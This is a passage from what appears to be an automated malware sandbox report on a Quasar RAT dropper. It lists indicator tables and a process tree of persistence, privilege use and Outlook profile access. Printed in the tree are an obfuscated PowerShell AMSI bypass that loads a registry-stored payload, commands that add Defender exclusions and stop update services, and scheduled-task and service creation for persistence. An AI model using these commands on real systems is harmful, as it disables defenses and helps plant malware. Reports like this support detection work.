7400	schtasks.exe
5152	schtasks.exe
3936	schtasks.exe
8120	schtasks.exe
9188	schtasks.exe
7588	schtasks.exe

Suspicious behavior: AddClipboardFormatListener 1 IoCs

pid	Process
4236	EXCEL.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
468	chrome.exe
468	chrome.exe
3324	build.exe
3324	build.exe
3324	build.exe
3324	build.exe
3324	build.exe
3324	build.exe
3324	build.exe
3324	build.exe
3324	build.exe
3324	build.exe
3324	build.exe
3324	build.exe
3324	build.exe
3324	build.exe
3324	build.exe
3324	build.exe
3324	build.exe
3324	build.exe
3324	build.exe
3240	gem1.exe
3240	gem1.exe
5572	gem2.exe
1316	powershell.exe
1316	powershell.exe
1316	powershell.exe
5572	gem2.exe
5572	gem2.exe
5572	gem2.exe
5572	gem2.exe
5572	gem2.exe
5572	gem2.exe
5572	gem2.exe
5572	gem2.exe
5572	gem2.exe
5572	gem2.exe
5572	gem2.exe
5572	gem2.exe
5692	dialer.exe
5692	dialer.exe
5572	gem2.exe
5572	gem2.exe
5692	dialer.exe
5572	gem2.exe
5692	dialer.exe
5692	dialer.exe
5692	dialer.exe
6932	Lightshot.exe
5692	dialer.exe
5692	dialer.exe
6956	powershell.exe
6956	powershell.exe
5692	dialer.exe
5692	dialer.exe
6956	powershell.exe
5692	dialer.exe
5692	dialer.exe
5692	dialer.exe
5692	dialer.exe
5692	dialer.exe
5692	dialer.exe
5692	dialer.exe
5692	dialer.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 4 IoCs

pid	Process
468	chrome.exe
468	chrome.exe
468	chrome.exe
468	chrome.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeRestorePrivilege	756	7zFM.exe
Token: 35	756	7zFM.exe
Token: SeSecurityPrivilege	756	7zFM.exe
Token: SeDebugPrivilege	1832	._cache_New Text Document mod.exe
Token: SeDebugPrivilege	2136	voidware_loader.exe
Token: SeShutdownPrivilege	468	chrome.exe
Token: SeCreatePagefilePrivilege	468	chrome.exe
Token: SeShutdownPrivilege	468	chrome.exe
Token: SeCreatePagefilePrivilege	468	chrome.exe
Token: SeDebugPrivilege	4332	DirectX111.exe
Token: SeShutdownPrivilege	468	chrome.exe
Token: SeCreatePagefilePrivilege	468	chrome.exe
Token: SeShutdownPrivilege	468	chrome.exe
Token: SeCreatePagefilePrivilege	468	chrome.exe
Token: SeShutdownPrivilege	468	chrome.exe
Token: SeCreatePagefilePrivilege	468	chrome.exe
Token: SeShutdownPrivilege	468	chrome.exe
Token: SeCreatePagefilePrivilege	468	chrome.exe
Token: SeShutdownPrivilege	468	chrome.exe
Token: SeCreatePagefilePrivilege	468	chrome.exe
Token: SeShutdownPrivilege	468	chrome.exe
Token: SeCreatePagefilePrivilege	468	chrome.exe
Token: SeShutdownPrivilege	468	chrome.exe
Token: SeCreatePagefilePrivilege	468	chrome.exe
Token: SeShutdownPrivilege	468	chrome.exe
Token: SeCreatePagefilePrivilege	468	chrome.exe
Token: SeShutdownPrivilege	468	chrome.exe
Token: SeCreatePagefilePrivilege	468	chrome.exe
Token: SeDebugPrivilege	3324	build.exe
Token: SeDebugPrivilege	4652	firefox.exe
Token: SeDebugPrivilege	4652	firefox.exe
Token: SeDebugPrivilege	4652	firefox.exe
Token: SeDebugPrivilege	4652	firefox.exe
Token: SeDebugPrivilege	4652	firefox.exe
Token: SeDebugPrivilege	4652	firefox.exe
Token: SeDebugPrivilege	4652	firefox.exe
Token: SeDebugPrivilege	4652	firefox.exe
Token: SeDebugPrivilege	4652	firefox.exe
Token: SeDebugPrivilege	4652	firefox.exe
Token: SeDebugPrivilege	4652	firefox.exe
Token: SeDebugPrivilege	4652	firefox.exe
Token: SeDebugPrivilege	4652	firefox.exe
Token: SeDebugPrivilege	4652	firefox.exe
Token: SeDebugPrivilege	3240	gem1.exe
Token: SeImpersonatePrivilege	3240	gem1.exe
Token: SeDebugPrivilege	4652	firefox.exe
Token: SeDebugPrivilege	4652	firefox.exe
Token: SeDebugPrivilege	4652	firefox.exe
Token: SeDebugPrivilege	4652	firefox.exe
Token: SeDebugPrivilege	4652	firefox.exe
Token: SeDebugPrivilege	4652	firefox.exe
Token: SeDebugPrivilege	4652	firefox.exe
Token: SeDebugPrivilege	4652	firefox.exe
Token: SeDebugPrivilege	4652	firefox.exe
Token: SeDebugPrivilege	388	._cache_New Text Document mod.exe
Token: SeDebugPrivilege	1316	powershell.exe
Token: SeIncreaseQuotaPrivilege	1316	powershell.exe
Token: SeSecurityPrivilege	1316	powershell.exe
Token: SeTakeOwnershipPrivilege	1316	powershell.exe
Token: SeLoadDriverPrivilege	1316	powershell.exe
Token: SeSystemProfilePrivilege	1316	powershell.exe
Token: SeSystemtimePrivilege	1316	powershell.exe
Token: SeProfSingleProcessPrivilege	1316	powershell.exe
Token: SeIncBasePriorityPrivilege	1316	powershell.exe

Suspicious use of FindShellTrayWindow 49 IoCs

pid	Process
756	7zFM.exe
756	7zFM.exe
468	chrome.exe
468	chrome.exe
468	chrome.exe
468	chrome.exe
468	chrome.exe
468	chrome.exe
468	chrome.exe
468	chrome.exe
468	chrome.exe
468	chrome.exe
468	chrome.exe
468	chrome.exe
468	chrome.exe
468	chrome.exe
468	chrome.exe
468	chrome.exe
468	chrome.exe
468	chrome.exe
468	chrome.exe
468	chrome.exe
468	chrome.exe
468	chrome.exe
468	chrome.exe
468	chrome.exe
468	chrome.exe
468	chrome.exe
4652	firefox.exe
4652	firefox.exe
4652	firefox.exe
4652	firefox.exe
4652	firefox.exe
4652	firefox.exe
4652	firefox.exe
4652	firefox.exe
4652	firefox.exe
4652	firefox.exe
4652	firefox.exe
4652	firefox.exe
4652	firefox.exe
4652	firefox.exe
4652	firefox.exe
4652	firefox.exe
4652	firefox.exe
4652	firefox.exe
4652	firefox.exe
4652	firefox.exe
4652	firefox.exe

Suspicious use of SendNotifyMessage 44 IoCs

pid	Process
468	chrome.exe
468	chrome.exe
468	chrome.exe
468	chrome.exe
468	chrome.exe
468	chrome.exe
468	chrome.exe
468	chrome.exe
468	chrome.exe
468	chrome.exe
468	chrome.exe
468	chrome.exe
468	chrome.exe
468	chrome.exe
468	chrome.exe
468	chrome.exe
468	chrome.exe
468	chrome.exe
468	chrome.exe
468	chrome.exe
468	chrome.exe
468	chrome.exe
468	chrome.exe
468	chrome.exe
4652	firefox.exe
4652	firefox.exe
4652	firefox.exe
4652	firefox.exe
4652	firefox.exe
4652	firefox.exe
4652	firefox.exe
4652	firefox.exe
4652	firefox.exe
4652	firefox.exe
4652	firefox.exe
4652	firefox.exe
4652	firefox.exe
4652	firefox.exe
4652	firefox.exe
4652	firefox.exe
4652	firefox.exe
4652	firefox.exe
4652	firefox.exe
4652	firefox.exe

Suspicious use of SetWindowsHookEx 23 IoCs

pid	Process
4236	EXCEL.EXE
4236	EXCEL.EXE
4236	EXCEL.EXE
4236	EXCEL.EXE
4236	EXCEL.EXE
4236	EXCEL.EXE
4236	EXCEL.EXE
4236	EXCEL.EXE
4652	firefox.exe
4652	firefox.exe
4652	firefox.exe
4652	firefox.exe
4652	firefox.exe
4652	firefox.exe
4652	firefox.exe
4652	firefox.exe
4652	firefox.exe
4652	firefox.exe
4652	firefox.exe
4652	firefox.exe
4652	firefox.exe
4652	firefox.exe
4652	firefox.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1428 wrote to memory of 1832	1428	New Text Document mod.exe	84
PID 1428 wrote to memory of 1832	1428	New Text Document mod.exe	84
PID 1428 wrote to memory of 1668	1428	New Text Document mod.exe	86
PID 1428 wrote to memory of 1668	1428	New Text Document mod.exe	86
PID 1428 wrote to memory of 1668	1428	New Text Document mod.exe	86
PID 468 wrote to memory of 3556	468	chrome.exe	95
PID 468 wrote to memory of 3556	468	chrome.exe	95
PID 1832 wrote to memory of 2136	1832	._cache_New Text Document mod.exe	96
PID 1832 wrote to memory of 2136	1832	._cache_New Text Document mod.exe	96
PID 468 wrote to memory of 1212	468	chrome.exe	97
PID 468 wrote to memory of 1212	468	chrome.exe	97
PID 468 wrote to memory of 1212	468	chrome.exe	97
PID 468 wrote to memory of 1212	468	chrome.exe	97
PID 468 wrote to memory of 1212	468	chrome.exe	97
PID 468 wrote to memory of 1212	468	chrome.exe	97
PID 468 wrote to memory of 1212	468	chrome.exe	97
PID 468 wrote to memory of 1212	468	chrome.exe	97
PID 468 wrote to memory of 1212	468	chrome.exe	97
PID 468 wrote to memory of 1212	468	chrome.exe	97
PID 468 wrote to memory of 1212	468	chrome.exe	97
PID 468 wrote to memory of 1212	468	chrome.exe	97
PID 468 wrote to memory of 1212	468	chrome.exe	97
PID 468 wrote to memory of 1212	468	chrome.exe	97
PID 468 wrote to memory of 1212	468	chrome.exe	97
PID 468 wrote to memory of 1212	468	chrome.exe	97
PID 468 wrote to memory of 1212	468	chrome.exe	97
PID 468 wrote to memory of 1212	468	chrome.exe	97
PID 468 wrote to memory of 1212	468	chrome.exe	97
PID 468 wrote to memory of 1212	468	chrome.exe	97
PID 468 wrote to memory of 1212	468	chrome.exe	97
PID 468 wrote to memory of 1212	468	chrome.exe	97
PID 468 wrote to memory of 1212	468	chrome.exe	97
PID 468 wrote to memory of 1212	468	chrome.exe	97
PID 468 wrote to memory of 1212	468	chrome.exe	97
PID 468 wrote to memory of 1212	468	chrome.exe	97
PID 468 wrote to memory of 1212	468	chrome.exe	97
PID 468 wrote to memory of 1212	468	chrome.exe	97
PID 468 wrote to memory of 1212	468	chrome.exe	97
PID 468 wrote to memory of 1212	468	chrome.exe	97
PID 468 wrote to memory of 4400	468	chrome.exe	98
PID 468 wrote to memory of 4400	468	chrome.exe	98
PID 468 wrote to memory of 4664	468	chrome.exe	99
PID 468 wrote to memory of 4664	468	chrome.exe	99
PID 468 wrote to memory of 4664	468	chrome.exe	99
PID 468 wrote to memory of 4664	468	chrome.exe	99
PID 468 wrote to memory of 4664	468	chrome.exe	99
PID 468 wrote to memory of 4664	468	chrome.exe	99
PID 468 wrote to memory of 4664	468	chrome.exe	99
PID 468 wrote to memory of 4664	468	chrome.exe	99
PID 468 wrote to memory of 4664	468	chrome.exe	99
PID 468 wrote to memory of 4664	468	chrome.exe	99
PID 468 wrote to memory of 4664	468	chrome.exe	99
PID 468 wrote to memory of 4664	468	chrome.exe	99
PID 468 wrote to memory of 4664	468	chrome.exe	99
PID 468 wrote to memory of 4664	468	chrome.exe	99
PID 468 wrote to memory of 4664	468	chrome.exe	99
PID 468 wrote to memory of 4664	468	chrome.exe	99
PID 468 wrote to memory of 4664	468	chrome.exe	99
PID 468 wrote to memory of 4664	468	chrome.exe	99
PID 468 wrote to memory of 4664	468	chrome.exe	99
PID 468 wrote to memory of 4664	468	chrome.exe	99
PID 468 wrote to memory of 4664	468	chrome.exe	99
PID 468 wrote to memory of 4664	468	chrome.exe	99
PID 468 wrote to memory of 4664	468	chrome.exe	99

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

cURL User-Agent 1 IoCs

Uses User-Agent string associated with cURL utility.

description	flow	ioc
HTTP User-Agent header	687	curl/8.7.1

outlook_office_path 1 IoCs

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-3454535599-122122096-1812617400-1000\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	gem1.exe

outlook_win_path 1 IoCs

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-3454535599-122122096-1812617400-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	gem1.exe

C:\Windows\system32\winlogon.exe
winlogon.exe
1⤵
PID:628
- C:\Windows\system32\dwm.exe
  "dwm.exe"
  2⤵
  PID:1076
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{daedd76b-2bd7-4321-b781-352feb9b8f6b}
  2⤵
  PID:4112

C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
1⤵
PID:680

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
1⤵
PID:964

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
1⤵
PID:412

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
1⤵
- Indicator Removal: Clear Windows Event Logs
PID:420

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
1⤵
PID:636

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
1⤵
PID:884

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
1⤵
PID:1040

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
1⤵
PID:1204

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
1⤵
PID:1276
- C:\Windows\system32\taskhostw.exe
  taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
  2⤵
  PID:3132
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE" "function Local:dftHHpuOwqrk{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$JXENHFhsWNMmCP,[Parameter(Position=1)][Type]$AZlJKzATGJ)$qfIxlMqdHlF=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('Re'+[Char](102)+''+'l'+'e'+'c'+''+'t'+''+'e'+'d'+[Char](68)+''+[Char](101)+''+[Char](108)+''+'e'+''+'g'+'a'+'t'+'e')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+'I'+'nMem'+[Char](111)+''+[Char](114)+''+[Char](121)+''+[Char](77)+''+'o'+''+'d'+''+'u'+'le',$False).DefineType(''+[Char](77)+''+'y'+''+'D'+'e'+[Char](108)+''+[Char](101)+'g'+[Char](97)+''+[Char](116)+'e'+[Char](84)+''+[Char](121)+'p'+'e'+'',''+'C'+''+'l'+''+'a'+''+'s'+''+[Char](115)+','+[Char](80)+'ub'+'l'+'i'+'c'+''+[Char](44)+''+[Char](83)+''+'e'+''+[Char](97)+''+'l'+''+[Char](101)+''+'d'+','+'A'+''+[Char](110)+''+[Char](115)+''+[Char](105)+''+[Char](67)+''+[Char](108)+'a'+'s'+''+[Char](115)+''+','+'A'+[Char](117)+''+[Char](116)+'oCla'+[Char](115)+''+'s'+'',[MulticastDelegate]);$qfIxlMqdHlF.DefineConstructor(''+'R'+'T'+[Char](83)+''+[Char](112)+''+[Char](101)+''+[Char](99)+''+'i'+'a'+'l'+'N'+'a'+'m'+'e'+''+[Char](44)+'H'+[Char](105)+''+[Char](100)+'e'+[Char](66)+''+[Char](121)+''+'S'+''+[Char](105)+''+[Char](103)+''+[Char](44)+''+'P'+''+[Char](117)+''+[Char](98)+''+[Char](108)+''+[Char](105)+'c',[Reflection.CallingConventions]::Standard,$JXENHFhsWNMmCP).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+[Char](110)+'t'+'i'+'m'+[Char](101)+''+[Char](44)+''+[Char](77)+''+[Char](97)+'n'+[Char](97)+''+'g'+''+[Char](101)+''+'d'+'');$qfIxlMqdHlF.DefineMethod(''+[Char](73)+'n'+[Char](118)+''+'o'+''+'k'+''+[Char](101)+'',''+[Char](80)+''+[Char](117)+''+[Char](98)+''+[Char](108)+''+[Char](105)+''+'c'+''+[Char](44)+''+'H'+''+[Char](105)+''+[Char](100)+''+[Char](101)+'By'+'S'+''+[Char](105)+'g'+','+'N'+'e'+''+[Char](119)+''+[Char](83)+''+[Char](108)+''+'o'+''+[Char](116)+','+'V'+''+[Char](105)+''+[Char](114)+''+[Char](116)+'u'+[Char](97)+''+[Char](108)+'',$AZlJKzATGJ,$JXENHFhsWNMmCP).SetImplementationFlags(''+[Char](82)+''+'u'+''+[Char](110)+''+'t'+''+[Char](105)+''+[Char](109)+''+'e'+''+','+'Ma'+[Char](110)+''+[Char](97)+'ge'+[Char](100)+'');Write-Output $qfIxlMqdHlF.CreateType();}$VevXusRHcEqky=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+[Char](121)+''+[Char](115)+'t'+[Char](101)+''+[Char](109)+''+[Char](46)+''+[Char](100)+''+[Char](108)+''+[Char](108)+'')}).GetType('M'+'i'+''+'c'+''+'r'+''+'o'+''+'s'+''+[Char](111)+'f'+[Char](116)+''+[Char](46)+'W'+[Char](105)+'n'+[Char](51)+''+[Char](50)+''+'.'+'Un'+'s'+''+[Char](97)+''+[Char](102)+''+[Char](101)+'N'+[Char](97)+'ti'+[Char](118)+''+[Char](101)+''+[Char](77)+''+[Char](101)+''+[Char](116)+'h'+'o'+''+'d'+'s');$hdimTdFMdImlkY=$VevXusRHcEqky.GetMethod(''+[Char](71)+''+[Char](101)+''+'t'+'P'+[Char](114)+''+[Char](111)+''+[Char](99)+''+[Char](65)+''+[Char](100)+''+'d'+''+[Char](114)+''+[Char](101)+''+[Char](115)+''+'s'+'',[Reflection.BindingFlags]('P'+[Char](117)+''+[Char](98)+''+[Char](108)+''+[Char](105)+''+'c'+''+[Char](44)+''+[Char](83)+''+[Char](116)+''+'a'+''+[Char](116)+''+[Char](105)+''+'c'+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$YAgzTOWygDyyPaCsjte=dftHHpuOwqrk @([String])([IntPtr]);$RZECMrGTbKHMENsGwlkGAP=dftHHpuOwqrk @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$xsaHCteqTRI=$VevXusRHcEqky.GetMethod(''+[Char](71)+''+'e'+''+[Char](116)+''+'M'+'o'+[Char](100)+''+'u'+''+'l'+''+[Char](101)+''+[Char](72)+'a'+[Char](110)+''+[Char](100)+''+'l'+''+[Char](101)+'').Invoke($Null,@([Object](''+'k'+''+[Char](101)+'rn'+'e'+''+[Char](108)+''+[Char](51)+'2'+'.'+''+[Char](100)+''+[Char](108)+'l')));$yfBQKgnzzHKYbR=$hdimTdFMdImlkY.Invoke($Null,@([Object]$xsaHCteqTRI,[Object]('L'+'o'+''+'a'+'dLi'+[Char](98)+'r'+[Char](97)+''+[Char](114)+''+[Char](121)+''+[Char](65)+'')));$rGnlYTlHqpcSDyRHP=$hdimTdFMdImlkY.Invoke($Null,@([Object]$xsaHCteqTRI,[Object](''+'V'+'i'+[Char](114)+'t'+[Char](117)+''+'a'+'lP'+'r'+'otec'+[Char](116)+'')));$oqvfjqq=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($yfBQKgnzzHKYbR,$YAgzTOWygDyyPaCsjte).Invoke(''+[Char](97)+''+[Char](109)+''+[Char](115)+''+'i'+''+[Char](46)+''+[Char](100)+''+[Char](108)+''+[Char](108)+'');$LfDiYnmHCtufAvuPx=$hdimTdFMdImlkY.Invoke($Null,@([Object]$oqvfjqq,[Object](''+'A'+'m'+[Char](115)+''+[Char](105)+''+'S'+''+[Char](99)+'an'+[Char](66)+''+'u'+'f'+'f'+''+[Char](101)+''+[Char](114)+'')));$PlPERuTjDF=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($rGnlYTlHqpcSDyRHP,$RZECMrGTbKHMENsGwlkGAP).Invoke($LfDiYnmHCtufAvuPx,[uint32]8,4,[ref]$PlPERuTjDF);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$LfDiYnmHCtufAvuPx,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($rGnlYTlHqpcSDyRHP,$RZECMrGTbKHMENsGwlkGAP).Invoke($LfDiYnmHCtufAvuPx,[uint32]8,0x20,[ref]$PlPERuTjDF);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+'OF'+[Char](84)+''+'W'+'A'+[Char](82)+'E').GetValue(''+'$'+''+[Char](76)+''+[Char](77)+''+[Char](88)+''+'s'+''+[Char](116)+''+[Char](97)+''+[Char](103)+''+[Char](101)+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  PID:8668

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
1⤵
PID:1376

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
1⤵
PID:1400

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
1⤵
PID:1416

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
1⤵
PID:1472

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
1⤵
PID:1604
- C:\Windows\system32\sihost.exe
  sihost.exe
  2⤵
  PID:2988

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
1⤵
PID:1620

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
1⤵
PID:1644

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
1⤵
PID:1708

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
1⤵
PID:1728

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1872

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
1⤵
PID:2004

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:2012

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:2032

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
1⤵
PID:1404

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
1⤵
PID:2052

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
1⤵
PID:2072

C:\Windows\System32\spoolsv.exe
C:\Windows\System32\spoolsv.exe
1⤵
PID:2232

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
1⤵
PID:2316

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
1⤵
PID:2420

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
1⤵
PID:2560

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
1⤵
PID:2568

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
1⤵
PID:2636

C:\Windows\sysmon.exe
C:\Windows\sysmon.exe
1⤵
PID:2664

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
1⤵
PID:2756

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
1⤵
PID:2796

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
1⤵
PID:2808

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
1⤵
PID:2496

C:\Windows\system32\wbem\unsecapp.exe
C:\Windows\system32\wbem\unsecapp.exe -Embedding
1⤵
PID:2804

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker
1⤵
PID:3280

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
1⤵
PID:3548

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Modifies registry class
PID:3616
- C:\Program Files\7-Zip\7zFM.exe
  "C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe.zip"
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of FindShellTrayWindow
  PID:756
- C:\Users\Admin\Desktop\New Text Document mod.exe
  "C:\Users\Admin\Desktop\New Text Document mod.exe"
  2⤵
  - Quasar RAT
  - Checks computer location settings
  - Executes dropped EXE
  - Adds Run key to start application
  - System Location Discovery: System Language Discovery
  - Modifies registry class
  - Suspicious use of WriteProcessMemory
  PID:1428
- - C:\Users\Admin\Desktop\._cache_New Text Document mod.exe
    "C:\Users\Admin\Desktop\._cache_New Text Document mod.exe"
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:1832
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:3124
  - - C:\Users\Admin\Desktop\a\voidware_loader.exe
      "C:\Users\Admin\Desktop\a\voidware_loader.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of AdjustPrivilegeToken
      PID:2136
    - - C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "DirectX" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\DirectX111.exe" /rl HIGHEST /f
        5⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:1144
    - - C:\Users\Admin\AppData\Roaming\SubDir\DirectX111.exe
        
        "C:\Users\Admin\AppData\Roaming\SubDir\DirectX111.exe"
        5⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:4332
      - C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "DirectX" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\DirectX111.exe" /rl HIGHEST /f
        6⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:3936
  - - C:\Users\Admin\Desktop\a\build.exe
      "C:\Users\Admin\Desktop\a\build.exe"
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3324
  - - C:\Users\Admin\Desktop\a\gem2.exe
      "C:\Users\Admin\Desktop\a\gem2.exe"
      4⤵
      Executes dropped EXE
      Drops file in System32 directory
      Suspicious use of SetThreadContext
      Suspicious behavior: EnumeratesProcesses
      PID:5572
    - - C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
        
        C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1316
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
        5⤵
        
        PID:5080
      - C:\Windows\system32\wusa.exe
        
        wusa /uninstall /kb:890830 /quiet /norestart
        6⤵
        
        PID:5372
    - - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop UsoSvc
        5⤵
        Launches sc.exe
        
        PID:4672
    - - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop WaaSMedicSvc
        5⤵
        Launches sc.exe
        
        PID:5304
    - - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop wuauserv
        5⤵
        Launches sc.exe
        
        PID:5324
    - - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop bits
        5⤵
        Launches sc.exe
        
        PID:3036
    - - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop dosvc
        5⤵
        Launches sc.exe
        
        PID:5396
    - - C:\Windows\system32\powercfg.exe
        
        C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
        5⤵
        Power Settings
        
        PID:5612
    - - C:\Windows\system32\powercfg.exe
        
        C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
        5⤵
        Power Settings
        
        PID:5620
    - - C:\Windows\system32\powercfg.exe
        
        C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
        5⤵
        Power Settings
        
        PID:5624
    - - C:\Windows\system32\powercfg.exe
        
        C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
        5⤵
        Power Settings
        
        PID:5680
    - - C:\Windows\system32\dialer.exe
        
        C:\Windows\system32\dialer.exe
        5⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:5692
    - - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe delete "GeekBrains"
        5⤵
        Launches sc.exe
        
        PID:3560
    - - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe create "GeekBrains" binpath= "C:\ProgramData\Screenshots\Lightshot.exe" start= "auto"
        5⤵
        Launches sc.exe
        
        PID:3876
      - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        6⤵
        
        PID:5504
